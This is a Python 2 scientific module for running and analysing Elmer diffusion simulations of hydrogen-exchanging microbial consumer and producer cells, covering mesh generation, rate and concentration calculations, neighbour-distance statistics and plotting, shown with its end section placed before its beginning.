self.vars['rate'] += mean_rate
counter += 1
self.vars['rate'] /= counter
return self.vars['rate']
def calc_amean_surf_concn(self, concn_array):
surface_nodes = [(i, self.j_range[0]) for i in self.i_range] + \
[(i, self.j_range[-1]+1) for i in self.i_range] + \
[(self.i_range[0], j) for j in self.j_range[1:]] + \
[(self.i_range[-1]+1, j) for j in self.j_range+[self.j_range[-1]+1]]
concns = [concn_array[i][j] for (i, j) in surface_nodes]
self.vars['amean_surf_concn'] = numpy.mean(concns)
return self.vars['amean_surf_concn']
def position(self):
if 'z' in self.vars.keys():
return (self.vars['x'], self.vars['y'], self.vars['z'])
else:
return (self.vars['x'], self.vars['y'])
class AnalyticApproach:
def __init__(self):
self.A = 1
self.qmaxA = 1.0
self.pmax = 10.0
self.kA = 1.0
self.B = 1
self.qmaxB = 1.0
self.pmin = 0.1
self.kB = 1.0
def set_parameters(self, A=None, qmaxA=None, pmax=None, kA=None,
B=None, qmaxB=None, pmin=None, kB=None):
self.A = self.A if A == None else A
self.qmaxA = self.qmaxA if qmaxA == None else qmaxA
self.pmax = self.pmax if pmax == None else pmax
self.kA = self.kA if kA == None else kA
self.B = self.B if B == None else B
self.qmaxB = self.qmaxB if qmaxB == None else qmaxB
self.pmin = self.pmin if pmin == None else pmin
self.kB = self.kB if kB == None else kB
def production(self, p):
return self.A*self.qmaxA*(self.pmax-p)/(self.pmax+self.kA+p)
def calc_equal_concn(self):
qmaxAA, qmaxBB = self.qmaxA*self.A, self.qmaxB*self.B
q2 = qmaxAA + qmaxBB
q1 = qmaxAA*(self.kB + self.pmin - self.pmax) \
+ qmaxBB*(self.kA + self.pmax - self.pmin)
q0 = - qmaxBB*self.kA*self.pmin \
- qmaxAA*self.kB*self.pmax - q2*self.pmax*self.pmin
roots = numpy.roots([q2, q1, q0])
p = max(roots)
return p
def calc_equal_concn_rate(self):
p = self.calc_equal_concn()
return self.production(p)
def sensitivity_analysis(self, cv=0.1, return_rate=False, return_diffs=True):
params = (self.A, self.qmaxA, self.pmax, self.kA,
self.B, self.qmaxB, self.pmin, self.kB)
if return_rate:
norm_val = self.calc_equal_concn_rate()
else:
norm_val = self.calc_equal_concn()
max_val, min_val = norm_val, norm_val
cv_range = [(1-cv), 1, (1+cv)]
for a in cv_range:
for qa in cv_range:
for px in cv_range:
for ka in cv_range:
for b in cv_range:
for qb in cv_range:
for pn in cv_range:
for kb in cv_range:
self.set_parameters(A=a*params[0],
qmaxA=qa*params[1],
pmax=px*params[2],
kA=ka*params[3],
B=b*params[4],
qmaxB=qb*params[5],
pmin=pn*params[6],
kB=kb*params[7])
if return_rate:
val = self.calc_equal_concn_rate()
else:
val = self.calc_equal_concn()
max_val = max(max_val, val)
min_val = min(min_val, val)
self.set_parameters(A=params[0], qmaxA=params[1], pmax=params[2],
kA=params[3], B=params[4], qmaxB=params[5],
pmin=params[6], kB=params[7])
if return_diffs:
minus_diff = norm_val - min_val
plus_diff = max_val - norm_val
return minus_diff, plus_diff
else:
return min_val, max_val
class SimCollection:
def __init__(self, simulation):
if isinstance(simulation, list):
self.simulations = simulation
simulation = self.simulations[0]
else:
self.simulations = [simulation]
self.wrapping = simulation.wrapping
self.side_length = simulation.side_length
self.is_3d = simulation.is_3d
self.consumers = simulation.consumers
self.producers = simulation.producers
self.random_seed = simulation.random_seed
def add_if_belongs(self, simulation, diffs_allowed=['random_seed']):
comparitor = self.simulations[0]
belongs = True
if not simulation.wrapping == self.wrapping and \
not 'wrapping' in diffs_allowed:
belongs = False
if not simulation.side_length == self.side_length and \
not 'side_length' in diffs_allowed:
belongs = False
if not simulation.is_3d == self.is_3d and \
not 'is_3d' in diffs_allowed:
belongs = False
if not simulation.consumers == self.consumers and \
not 'consumers' in diffs_allowed:
belongs = False
if not simulation.producers == self.producers and \
not 'producers' in diffs_allowed:
belongs = False
if not simulation.random_seed == self.random_seed and \
not 'random_seed' in diffs_allowed:
belongs = False
if belongs:
self.simulations.append(simulation)
return belongs
def get_calculated_fluxes(self, detail_level, sif_name):
out = []
for sim in self.simulations:
rf = sim.get_run_results(detail_level, sif_name)
if detail_level > 1:
rf.update_concn_rate_results(detail_level)
out.append(rf.get_calculated_flux())
return out
def get_amean_concns(self, detail_level, sif_name):
return \
[sim.get_run_results(detail_level, sif_name).get_amean_concn() \
for sim in self.simulations]
def estimates_from_concn(self, detail_level, sif_name, D, pmin,
dist_mean='amean'):
sides = 6 if self.is_3d else 4
estimates = []
for sim in self.simulations:
p = sim.get_amean_concn(detail_level, sif_name)
d = sim.get_mean_NN_dist(detail_level, mean=dist_mean)
estimates.append(D*self.producers*sides*(p-pmin)/d)
return estimates
def estimates_from_surf_concn(self, detail_level, sif_name, D,
dist_mean='amean'):
sides = 6 if self.is_3d else 4
estimates = []
for sim in self.simulations:
pmin = sim.get_mean_surf_concn(detail_level, sif_name,
cell_type='consumers', mean='amean')
pmax = sim.get_mean_surf_concn(detail_level, sif_name,
cell_type='producers', mean='amean')
d = sim.get_mean_NN_dist(detail_level, mean=dist_mean)
estimates.append(D*self.producers*sides*(pmax-pmin)/d)
return estimates
def find_sim_collections(results_dir, diffs_allowed=['random_seed']):
sim_collections = []
for sim in get_replicate_simulations(results_dir):
sim_collection = None
for sc in sim_collections:
if sc.add_if_belongs(sim):
sim_collection = sc
break
if sim_collection == None:
sim_collection = SimCollection(sim)
sim_collections.append(sim_collection)
return sim_collections
# points should be given as a 2xn numpy.array
# side_length should be a positive real number (usually an integer)
def wrap_points(points, side_length, num_wraps=1, is_3d=False):
diffs = [i*side_length for i in range(num_wraps+1)]
diffs.extend([-d for d in diffs[1:]])
new_points = []
for point in points:
for x_diff in diffs:
for y_diff in diffs:
if is_3d:
for z_diff in diffs:
new_points.append(point + (x_diff, y_diff, z_diff))
else:
new_points.append(point + (x_diff, y_diff))
return numpy.array(new_points)
def every_cell_spatial_stats(root_dir, detail_level=1):
results_file = get_detail_level_results(root_dir, detail_level=detail_level)
results_file.get_space_parameters()
points = numpy.array([e.position() for e in results_file.events])
if results_file.wrapping:
points = wrap_points(points, results_file.side_length,
is_3d=results_file.is_3d)
triangulation = Delaunay(points)
indices, indptr = triangulation.vertex_neighbor_vertices
for event in results_file.events:
e_point = numpy.array(event.position())
row_number = toolbox_basic.find_index_of_row_in_array(points, e_point)
event.vars['eDT_nnbs'] = indices[row_number+1] - indices[row_number] +1
neighbor_indices = indptr[indices[row_number]:indices[row_number+1]]
nb_points = [points[i] for i in neighbor_indices]
def get_replicate_results(replicates_dir):
replicates_dir = toolbox_basic.check_path(replicates_dir)
results_path = os.path.join(replicates_dir, 'results.xml')
results_file = ReplicatesFile(path=results_path)
return results_file
def get_replicate_simulations(replicates_dir):
return [Simulation(d) for d in toolbox_basic.subdir_list(replicates_dir)]
def setup_replicate_results(replicates_dir):
results_file = get_replicate_results(replicates_dir)
replicate_simulations = get_replicate_simulations(replicates_dir)
wrapping = replicate_simulations[0].wrapping
is_3d=replicate_simulations[0].is_3d
side_length=replicate_simulations[0].side_length
results_file.set_space_parameters(wrapping=wrapping, is_3d=is_3d, side_length=side_length)
for sim in replicate_simulations:
if not ((sim.wrapping == wrapping) and
(sim.is_3d == is_3d) and
(sim.side_length == side_length)):
toolbox_basic.error_message('toolbox_elmer.get_replicates_results():'+
'Replicates have different space parameters', replicates_dir)
exit()
results_file.write()
return results_file
def get_replicate_results_basics(replicates_dir,
detail_level=1, sif_name='elmer_standard'):
replicate_simulations = get_replicate_simulations(replicates_dir)
results_file = setup_replicate_results(replicates_dir)
dl_resuls = results_file.get_detail_level_results(detail_level=detail_level)
sif_results = results_file.get_solver_input_file_results(
detail_level=detail_level, sif_name=sif_name)
#for sim in replicate_simulations:
results_file.write()
def hydrogen_logo(axis, bottom_left=(0.9, 0.9), height_width=0.1):
color = '0.5'
circle = toolbox_schematic.Circle()
circle.set_defaults(edgecolor='none', facecolor=color, transform=True)
radius = 0.2*height_width
center_A = (bottom_left[0] + radius, bottom_left[1] + height_width - radius)
center_B = (bottom_left[0] + height_width - radius, bottom_left[1] + radius)
circle.set_points(center_A, radius)
circle.draw(axis)
circle.set_points(center_B, radius)
circle.draw(axis)
print center_A, center_B
axis.plot([center_A[0], center_B[0]], [center_A[1], center_B[1]], color, linestyle='-', transform=axis.transAxes)
#center = ((bottom_left[0]+top_right[0])/2, (bottom_left[1]+top_right[1])/2)
'''
def get_combined_results(root_dir, detail_level=1, sif_name='elmer_standard'):
dl_results = get_detail_level_results(root_dir, detail_level=detail_level)
run_results = get_run_results(root_dir,
detail_level=detail_level, sif_name=sif_name)
for e in run_results.events:
for o in dl_results.events:
if o.position() == e.position():
for attrib in o.vars.keys():
e.vars[attrib] = o.vars[attrib]
run_results.set_read_only()
return run_results
'''
'''
def get_rate_array(root_dir, detail_level=1, sif_name='elmer_standard'):
run_dir = get_run_dir(root_dir,detail_level=detail_level,sif_name=sif_name)
array_path = os.path.join(run_dir, 'rate_array.npy')
array_path = toolbox_basic.check_path(array_path)
array = numpy.load(array_path)
return array
'''
'''
def calc_nearest_neighbor_distances(root_dir, detail_level=1):
simulation = Simulation(root_dir)
results_file = simulation.get_detail_level_results(detail_level)
#if ('eNN_dist' in results_file.get_eventList_column_names()): return
if results_file.is_event_list_column_name('eNN_dist'): return
#results_file.set_space_parameters()
cons_points = numpy.array([e.position() for e in results_file.consumers()])
prod_points = numpy.array([e.position() for e in results_file.producers()])
if simulation.wrapping:
cons_points = wrap_points(cons_points, simulation.side_length,
is_3d=simulation.is_3d)
prod_points = wrap_points(prod_points, simulation.side_length,
is_3d=simulation.is_3d)
cons_tree = KDTree(cons_points)
prod_tree = KDTree(prod_points)
for e in results_file.events:
c_dist, id = cons_tree.query(e.position())
p_dist, id = prod_tree.query(e.position())
e.vars['sNN_dist'] = c_dist if (e.vars['mark'] == 2) else p_dist
e.vars['oNN_dist'] = c_dist if (e.vars['mark'] == 3) else p_dist
e.vars['eNN_dist'] = min(c_dist, p_dist)
results_file.add_event_list_column_name('eNN_dist')
results_file.add_event_list_column_name('oNN_dist')
results_file.add_event_list_column_name('sNN_dist')
results_file.eventList.update_text()
results_file.write()
'''
| #/usr/bin/python
from __future__ import division
from __future__ import with_statement
import math
import matplotlib
from matplotlib import pyplot
from mpl_toolkits.axes_grid1 import make_axes_locatable
import numpy
from numpy import mean as amean
import os
import re
from scipy.spatial import Delaunay
from scipy.spatial import KDTree
from scipy.stats.mstats import gmean as gmean
from scipy.stats.mstats import hmean as hmean
import toolbox_basic
import toolbox_plotting
import toolbox_results_new as toolbox_results
import toolbox_schematic
import xml.etree.ElementTree as xmlTree
class Simulation:
def __init__(self, root_dir, find_protocol=True):
self.root_dir = toolbox_basic.check_path(root_dir)
if not find_protocol: return
# Set up the space from the protocol file.
protocol_path = toolbox_basic.find_protocol_file_path(self.root_dir)
self.protocol_tree = toolbox_basic.get_xml_tree(protocol_path)
space_params = self.protocol_tree.findall('./space/param')
for param in space_params:
name, text = param.attrib['name'], param.text
if name == 'wrapping': self.wrapping = (text == 'true')
elif name == 'length': self.side_length = int(float(text))
elif name == 'nDims': self.is_3d = (int(float(text)) == 3)
marks = self.protocol_tree.findall('./mark')
for mark in marks:
for param in mark:
if param.attrib['name'] == 'value':
value = int(param.text)
if param.attrib['name'] == 'number':
number = int(param.text)
if value == 2:
self.consumers = number
else:
self.producers = number
rs = self.protocol_tree.find("./process/param[@name='randomSeed']")
self.random_seed = int(rs.text)
def copy_mesh_files(self, detail_level, sif_name):
self.get_detail_level_mesh_dir(detail_level)
run_dir = self.get_run_dir(detail_level, sif_name)
run_mesh_dir = os.path.join(run_dir, 'mesh')
toolbox_basic.copy_dir(self.detail_level_mesh_dir, run_mesh_dir)
def get_concn_array(self, detail_level, sif_name):
self.get_run_dir(detail_level, sif_name)
grid_length = detail_level * self.side_length
array_path = os.path.join(self.run_dir, 'concn_array')
if os.path.isfile(array_path):
concn_array = toolbox_basic.load_array(array_path)
else:
result_file_path = os.path.join(self.run_dir, 'case.result')
result_file_path = toolbox_basic.check_path(result_file_path)
# This isn't quite correct! Without wrapping, Elmer skips some nodes
num_nodes = (grid_length + 1)**2
array_shape = (grid_length + 1,)*2
with open(result_file_path, 'Ur') as f:
last_lines = f.readlines()[-num_nodes:]
concn_array = numpy.array([float(line) for line in last_lines])
concn_array = numpy.reshape(concn_array, array_shape)
toolbox_basic.save_array(concn_array, array_path)
return concn_array
def get_consume_produce_functions(self, detail_level, sif_name):
self.get_sif_file_path(detail_level, sif_name)
with open(self.sif_file_path) as f:
lines = f.readlines()
regex = re.compile('\$ function consume.*')
cons_line = [line for line in lines if re.match(regex, line)][0]
min_index = cons_line.index('min(0.0')
close_index = cons_line.index(') }')
consume_rate = 'def consume_rate(c):\n\treturn min(0.0, %s)' \
%(cons_line[min_index+8:close_index])
regex = re.compile('\$ function produce.*')
prod_line = [line for line in lines if re.match(regex, line)][0]
min_index = prod_line.index('max(0.0')
close_index = prod_line.index(') }')
produce_rate = 'def produce_rate(c):\n\treturn max(0.0, %s)' \
%(prod_line[min_index+8:close_index])
exec consume_rate
exec produce_rate
return consume_rate, produce_rate
def get_detail_level_dir(self, detail_level):
name = 'detail_level_%d'%(detail_level)
self.detail_level_dir = os.path.join(self.root_dir, name)
toolbox_basic.make_dir(self.detail_level_dir)
return self.detail_level_dir
def get_detail_level_mesh_dir(self, detail_level):
self.get_detail_level_dir(detail_level)
self.detail_level_mesh_dir = os.path.join(self.detail_level_dir, 'mesh')
toolbox_basic.make_dir(self.detail_level_mesh_dir)
return self.detail_level_mesh_dir
def get_detail_level_results(self, detail_level, read_only=False):
self.get_detail_level_dir(detail_level)
cells_path = os.path.join(self.detail_level_dir, 'cell_locations.xml')
cells_file = SimulationResultsFile(path=cells_path, read_only=read_only)
return cells_file
def get_combined_results(self, detail_level, sif_name):
dl_results = self.get_detail_level_results(detail_level, read_only=True)
run_results = self.get_run_results(detail_level, sif_name, read_only=True)
for e in run_results.events:
for o in dl_results.events:
if o.position() == e.position():
for attrib in o.vars.keys():
e.vars[attrib] = o.vars[attrib]
return run_results
def get_rate_array(self, detail_level, sif_name):
self.get_run_dir(detail_level, sif_name)
array_path = os.path.join(self.run_dir, 'rate_array')
if not os.path.isfile(array_path):
self.get_run_results(detail_level, sif_name)
return toolbox_basic.load_array(array_path)
def get_run_results(self, detail_level, sif_name, read_only=False):
self.get_run_dir(detail_level, sif_name)
rates_path = os.path.join(self.run_dir, 'cell_rates.xml')
rates_file = SimulationResultsFile(path=rates_path, read_only=read_only)
if rates_file.events == []:
grid_length = self.side_length * detail_level
rates_file = self.get_detail_level_results(detail_level)
rates_file.path = rates_path
rates_file.setup_ranges(grid_length, self.wrapping)
rate_array = numpy.zeros((grid_length,)*2, dtype=numpy.float)
concn_array = self.get_concn_array(detail_level, sif_name)
consume_rate, produce_rate = \
self.get_consume_produce_functions(detail_level, sif_name)
rates_file.calc_rates_from_concn_array(concn_array, consume_rate,
produce_rate, rate_array=rate_array)
array_path = os.path.join(self.run_dir, 'rate_array')
toolbox_basic.save_array(rate_array, array_path)
head = 'mark,x,y'
if self.is_3d: head += ',z'
head += ',rate,amean_surf_concn'
rates_file.set_event_list_header(head)
rates_file.set_concn_rate_results(concn_array, rate_array)
rates_file.write()
return rates_file
def get_run_dir(self, detail_level, sif_name):
self.get_detail_level_dir(detail_level)
self.run_dir = os.path.join(self.detail_level_dir, sif_name)
toolbox_basic.make_dir(self.run_dir)
return self.run_dir
def get_sif_file_path(self, detail_level, sif_name):
self.get_run_dir(detail_level, sif_name)
self.sif_file_path = os.path.join(self.run_dir, sif_name+'.sif')
return self.sif_file_path
def make_start_file(self, detail_level, sif_name):
self.get_run_dir(detail_level, sif_name)
file_path = os.path.join(self.run_dir, 'ELMERSOLVER_STARTINFO')
with open(file_path, 'w') as f:
f.write('''%s\n1''' %(sif_name+'.sif'))
def make_mesh_files(self, biomass_array, detail_level):
self.get_detail_level_mesh_dir(detail_level)
grid_length = self.side_length * detail_level
num_elements = (grid_length)**2
num_nodes = (grid_length+1)**2
### Make mesh.header
header_path = os.path.join(self.detail_level_mesh_dir, 'mesh.header')
# The 2 denotes dimensions, 202's are boundaries, 404's are elements.
with open(header_path, 'w') as f:
f.write('%d\t%d\t%d\t\n2\t\n202\t%d\t\n404\t%d\t\n\t'
%(num_nodes, num_elements, num_elements, num_elements, num_elements))
### Make mesh.nodes
text = ''
for i in range(num_nodes):
# Shouldn't this take account of detail_level?
(y, x) = divmod(i, (grid_length+1))
# Consider changing this line to
#text += '%d -1 %.1f %.1f 0.0\n' %(i+1, x, y)
text += str(i+1)+' -1 '+str(x)+' '+str(y)+' 0.0\n'
nodes_path = os.path.join(self.detail_level_mesh_dir, 'mesh.nodes')
with open(nodes_path, 'w') as f:
f.write(text)
### Make mesh.elements
text = ''
counter = 0
for (i, j), body in numpy.ndenumerate(biomass_array):
counter += 1
n1 = (j+1) + (i*(grid_length+1))
n2 = n1 + 1
n3 = n2 + (grid_length+1)
n4 = n3 - 1
text += '%d %d 404 %d %d %d %d \n' %(counter, body, n1, n2, n3, n4)
elements_path = os.path.join(self.detail_level_mesh_dir, 'mesh.elements')
with open(elements_path, 'w') as f:
f.write(text)
### Make mesh.boundary
text = ''
counter = 0
# Along the bottom of the array (x=max) from left (y=0) to right (y=max).
e_base = grid_length*(grid_length - 1) + 1
n_base = grid_length*(grid_length + 1) + 1
for i in range(grid_length):
counter += 1
element = e_base + i
node = n_base + i
text += '%d 1 %d 0 202 %d %d \n' %(counter, element, node, node+1)
# Down the left of the array (y=0), from top (x=0) to bottom (x=max).
n_base = grid_length + 1
for i in range(grid_length):
counter += 1
element = (i*grid_length) + 1
node = 1 + i*n_base
text += '%d 2 %d 0 202 %d %d \n' %(counter, element, node, node+n_base)
# Along the top of the array (x=0) from left (y=0) to right (y=max).
for i in range(grid_length):
counter += 1
text += '%d 3 %d 0 202 %d %d \n' %(counter, i+1, i+1, i+2)
# Down the left of the array (y=max), from top (x=0) to bottom (x=max).
n_base = grid_length + 1
for i in range(grid_length):
counter += 1
element = (i+1)*grid_length
node = (i+1)*n_base
text += '%d 4 %d 0 202 %d %d \n' %(counter, element, node+n_base, node)
boundary_path = os.path.join(self.detail_level_mesh_dir, 'mesh.boundary')
with open(boundary_path, 'w') as f:
f.write(text)
def set_up_population(self, detail_level):
grid_length = self.side_length * detail_level
cells_file = self.get_detail_level_results(detail_level)
# If cells_file.events is empty then the detail level directory has
# probably only just been created, and this file does not yet exist.
if cells_file.events == []:
cells_file.set_space_parameters(wrapping=self.wrapping,
is_3d=self.is_3d, side_length=self.side_length)
bio_array_path = os.path.join(self.detail_level_dir, 'bio_array')
self.bio_array = numpy.ones((grid_length,)*2, dtype=numpy.int)
last_path = os.path.join(self.root_dir, 'lastIter',
'event_location_last.xml')
last_file = SimulationResultsFile(path=last_path, read_only=True)
cells_file.copy_event_list(last_file)
cells_file.set_up_population(detail_level, grid_length,
self.wrapping, self.bio_array)
toolbox_basic.save_array(self.bio_array, bio_array_path)
self.make_mesh_files(self.bio_array, detail_level)
# Finally, update and save the 'cell_locations.xml' file.
head = 'mark,x,i_min,i_max,y,j_min,j_max'
if self.is_3d: head += ',z,k_min,k_max'
cells_file.set_event_list_header(head)
cells_file.write()
else:
cells_file.setup_ranges(grid_length, self.wrapping)
return cells_file
def calc_amean_surf_concn(self, concn_array):
for event in self.event_list:
event.calc_amean_surf_concn(concn_array)
def plot_concn_array(self, axis, detail_level, sif_name, set_as_white=None, plot_cs=True):
array = self.get_concn_array(detail_level, sif_name)
extent = [-0.5/detail_level, self.side_length + 0.5/detail_level]*2
bottom_red, top_red = 0.1, 0.7
bottom_green, top_green = 0.6, 0.0
bottom_blue, top_blue = 0.1, 0.5
mid_point = 0.5
if not set_as_white == None:
max_val, min_val = numpy.max(array), numpy.min(array)
up_diff, down_diff = max_val - set_as_white, set_as_white - min_val
max_diff, total_diff = max(up_diff, down_diff), max_val - min_val
up_rel_diff, down_rel_diff = up_diff/max_diff, down_diff/max_diff
mid_point = down_diff/total_diff
cdict = {'red': ((0, bottom_red, bottom_red),
(mid_point, 1, 1),
(1, top_red, top_red)),
'green': ((0, bottom_green, bottom_green),
(mid_point, 1, 1),
(1, top_green, top_green)),
'blue': ((0, bottom_blue, bottom_blue),
(mid_point, 1, 1),
(1, top_blue, top_blue))}
my_cmap = \
matplotlib.colors.LinearSegmentedColormap('my_cmap', cdict, 255)
cs = axis.imshow(array, interpolation='nearest', origin='lower',
extent=extent, cmap=my_cmap)
axis.set_xlim(0.0, self.side_length), axis.set_ylim(0.0, self.side_length)
if plot_cs:
cbar = toolbox_plotting.make_colorbar(axis, cs, fontsize=8)
return cbar
else:
return cs
def plot_rate_array(self, axis, detail_level, sif_name):
array = self.get_rate_array(detail_level, sif_name)
extent = [0.0, self.side_length]*2
max_val = numpy.max(abs(array))
cdict = {'red': ((0, 0, 0), (0.5, 1, 1), (1, 1, 1)),
'green': ((0, 0, 0), (0.5, 1, 1), (1, 0, 0)),
'blue': ((0, 1, 1), (0.5, 1, 1), (1, 0, 0))}
cmap = matplotlib.colors.LinearSegmentedColormap('cmap', cdict, 255)
cs = axis.imshow(array, interpolation='nearest', extent=extent,
origin='lower', cmap=cmap)
cs.set_clim(-max_val, max_val)
axis.set_xlim(0.0, self.side_length)
axis.set_ylim(0.0, self.side_length)
toolbox_plotting.make_colorbar(axis, cs)
def plot_population(self, axis, detail_level, sif_name):
array = numpy.sign(self.get_rate_array(detail_level, sif_name))
extent = [0.0, self.side_length]*2
cdict = {'red': ((0, 0, 0), (0.5, 1, 1), (1, 1, 1)),
'green': ((0, 0, 0), (0.5, 1, 1), (1, 0, 0)),
'blue': ((0, 1, 1), (0.5, 1, 1), (1, 0, 0))}
cmap = matplotlib.colors.LinearSegmentedColormap('cmap', cdict, 3)
cs = axis.imshow(array, interpolation='nearest', extent=extent,
origin='lower', cmap=cmap)
cs.set_clim(-1.0, 1.0)
axis.set_xlim(0.0, self.side_length)
axis.set_ylim(0.0, self.side_length)
def calc_nearest_neighbor_distances(self, detail_level):
rf = self.get_detail_level_results(detail_level)
if rf.is_event_list_column_name('eNN_dist') and \
rf.is_event_list_column_name('eNN_dist') and \
rf.is_event_list_column_name('eNN_dist'):
return rf
cons_points = numpy.array([e.position() for e in rf.consumers()])
prod_points = numpy.array([e.position() for e in rf.producers()])
if self.wrapping:
cons_points = wrap_points(cons_points, self.side_length, is_3d=self.is_3d)
prod_points = wrap_points(prod_points, self.side_length, is_3d=self.is_3d)
cons_tree = KDTree(cons_points)
prod_tree = KDTree(prod_points)
for e in rf.events:
c_dist = cons_tree.query(e.position(), k=2)[0]
p_dist= prod_tree.query(e.position(), k=2)[0]
if (e.vars['mark'] == 2):
e.vars['sNN_dist'] = c_dist[1]
e.vars['oNN_dist'] = p_dist[0]
else:
e.vars['sNN_dist'] = p_dist[1]
e.vars['oNN_dist'] = c_dist[0]
e.vars['eNN_dist'] = min(e.vars['sNN_dist'], e.vars['oNN_dist'])
rf.add_event_list_column_name('eNN_dist')
rf.add_event_list_column_name('oNN_dist')
rf.add_event_list_column_name('sNN_dist')
#rf.eventList.update_text()
rf.write()
return rf
def get_mean_NN_dist(self, detail_level, mean='amean', dist='oNN_dist'):
rf = self.calc_nearest_neighbor_distances(detail_level)
dists = [e.vars[dist] for e in rf.events]
if not mean in ['amean', 'gmean', 'hmean']:
toolbox_basic.error_message('toolbix_elmer.Simulation.get_mean_NN_dist()',
'mean not recognised: %s'%(mean))
exec 'def mean(x): return %s(x)'%(mean)
return mean(dists)
def scatter_oNN_dist_vs_rate(self, axis, detail_level, sif_name, markersize=5):
rf = self.get_combined_results(detail_level, sif_name)
cons_rates = [-e.vars['rate'] for e in rf.consumers()]
cons_dists = [e.vars['oNN_dist'] for e in rf.consumers()]
axis.plot(cons_dists, cons_rates, '.', color='blue', markersize=markersize)
prod_rates = [e.vars['rate'] for e in rf.producers()]
prod_dists = [e.vars['oNN_dist'] for e in rf.producers()]
axis.plot(prod_dists, prod_rates, '.', color='red', markersize=markersize)
axis.set_xlabel(r'Interspecies N-N distance ($\mu$m)')
axis.set_ylabel('Abs. metabolic rate '+r'(zmol $cell^{-1} ms^{-1}$)')
axis.set_xlim(1, axis.get_xlim()[1])
def scatter_oNN_dist_vs_concn(self, axis, detail_level, sif_name, markersize=5):
rf = self.get_combined_results(detail_level, sif_name)
cons_concns = [e.vars['amean_surf_concn'] for e in rf.consumers()]
cons_dists = [e.vars['oNN_dist'] for e in rf.consumers()]
axis.plot(cons_dists, cons_concns, '.', color='blue', markersize=markersize)
prod_concns = [e.vars['amean_surf_concn'] for e in rf.producers()]
prod_dists = [e.vars['oNN_dist'] for e in rf.producers()]
axis.plot(prod_dists, prod_concns, '.', color='red', markersize=markersize)
axis.set_xlabel('Interspecies nearest neighbour distance')
axis.set_ylabel('Surface concentration')
axis.set_xlim(1, axis.get_xlim()[1])
def plot_kinetics(self, axis, detail_level, sif_name, maxs):
consume_rate, produce_rate = \
self.get_consume_produce_functions(detail_level, sif_name)
p = list(numpy.linspace(0, maxs, num=1000))
prod = [produce_rate(pval) for pval in p]
cons = [-consume_rate(pval) for pval in p]
axis.plot(p, prod, 'r-')
axis.plot(p, cons, 'b-')
#axis.set_xlabel(r'Product concentration ($\mu$M)')
axis.set_xlabel(r'Hydrogen concentration ($\mu$M)')
axis.set_ylabel('Metabolic rate '+r'(zmol $cell^{-1} ms^{-1}$)')
def make_run_plot(self, detail_level, sif_name, maxP=None):
fig = toolbox_plotting.ThesisFigure(double_column=True)
axis = fig.add_subplot('A', 221)
#self.plot_rate_array(axis, detail_level, sif_name)
self.plot_population(axis, detail_level, sif_name)
toolbox_plotting.empty_padding_axis(axis, "bottom")
axis = fig.add_subplot('B', 222)
toolbox_plotting.empty_padding_axis(axis, "bottom")
if maxP == None:
maxP = numpy.max(self.get_concn_array(detail_level, sif_name))
maxP = 10**math.ceil(math.log10(maxP))
self.plot_kinetics(axis, detail_level, sif_name, maxP)
axis.text(8, 0.2, r'$q_{A}([H])$', color='r', va='center', ha='center')
axis.text(8, 0.8, r'$-q_{B}([H])$', color='b', va='center', ha='center')
analytic = AnalyticApproach()
analytic.set_parameters(A=1, qmaxA=1, pmax=10, kA=10, qmaxB=5, pmin=0.04, kB=30)
p_equal = analytic.calc_equal_concn()
r_equal = analytic.production(p_equal)
axis.plot([p_equal]*2, [0,r_equal+0.05],
color='0.5', linestyle='-', zorder=-10)
axis.text(p_equal, r_equal+0.05, '%.2f'%(p_equal),
color='0.5', va='bottom', ha='center', fontsize=8)
axis.plot([0, p_equal+0.5], [r_equal]*2,
color='0.5', linestyle='-', zorder=-10)
axis.text(p_equal+0.6, r_equal, '%.2f'%(r_equal),
color='0.5', va='center', ha='left', fontsize=8)
axis = fig.add_subplot('C', 223)
cs = self.plot_concn_array(axis, detail_level, sif_name, plot_cs=False)
cbar = toolbox_plotting.make_colorbar(axis, cs, side="bottom")
#label = r'Product concentration ($\mu$M)'
label = r'Hydrogen concentration ($\mu$M)'
cbar.set_ticks([2.0, 2.1, 2.2, 2.3, 2.4, 2.5, 2.6, 2.7])
cbar.set_label(label)
axis.set_xticklabels(['']*10)
axis = fig.add_subplot('D', 224)
toolbox_plotting.empty_padding_axis(axis, "bottom")
self.calc_nearest_neighbor_distances(detail_level)
self.scatter_oNN_dist_vs_rate(axis, detail_level, sif_name)
fig.subplots_adjust(left=0.05, right=0.98, bottom=0.08, top=0.96,
wspace=0.3, hspace=0.25)
fig.process_subplots(label_pos=(0.0, 1.1))
axis = fig.find_axis_from_label('C')
axis.tick_params(bottom="off")
fig.save(os.path.join(self.get_run_dir(detail_level, sif_name), 'run_plot.pdf'))
def check_runs(self, rel_tol=1E-3):
for dl_dir in toolbox_basic.subdir_list(self.root_dir, 'detail_level_*'):
run_dirs = toolbox_basic.subdir_list(dl_dir)
for run_dir in run_dirs:
if os.path.basename(run_dir) == 'mesh':
continue
cell_file = os.path.join(run_dir, 'cell_rates.xml')
if os.path.isfile(cell_file):
cell_file = SimulationResultsFile(path=cell_file, read_only=True)
rel_diff = cell_file.get_relative_difference()
if rel_diff > rel_tol:
print('%s has rel_diff = %f'%(run_dir, rel_diff))
else:
print('%s has no cell_rates.xml file'%(run_dir))
def get_amean_concn(self, detail_level, sif_name):
rf = self.get_run_results(detail_level, sif_name, read_only=True)
return rf.get_amean_concn()
def get_mean_surf_concn(self, detail_level, sif_name,
cell_type='all', mean='amean'):
rf = self.get_run_results(detail_level, sif_name, read_only=True)
out = rf.get_mean_surf_concn(cell_type=cell_type, mean=mean)
return out
def get_sif_names(self, detail_level):
dl_dir = self.get_detail_level_dir(detail_level)
out = []
for subdir in toolbox_basic.subdir_list(dl_dir):
base_name = os.path.basename(subdir)
sif_path = os.path.join(subdir, base_name+'.sif')
if os.path.exists(sif_path):
out.append(base_name)
return out
class SimulationResultsFile(toolbox_results.ResultXMLfile):
def __init__(self, path=None, read_only=False, header='mark,x,y'):
toolbox_results.ResultXMLfile.__init__(self, path=path,
root_name='elmer', read_only=read_only)
self.simulation_root = self.find('./simulation')
if self.simulation_root == None:
self.simulation_root = xmlTree.SubElement(self.root, 'simulation')
self.eventList = self.get_subresult('./eventList')
if self.eventList == None:
self.eventList = toolbox_result.ResultXMLfile(root_name='eventList')
self.append_subresult(self.eventList)
self.events = self.eventList.read_in_text()
for line in self.events:
line.__class__ = EventResult
def get_event_list_column_names(self):
return self.eventList.header.split(',')
def set_space_parameters(self, wrapping=None, is_3d=None, side_length=None):
space = self.find('./simulation/space')
if space == None:
sim = self.find('./simulation')
space = xmlTree.SubElement(sim, 'space')
if not wrapping == None: space.set('wrapping', str(wrapping))
if not is_3d == None: space.set('is_3d', str(is_3d))
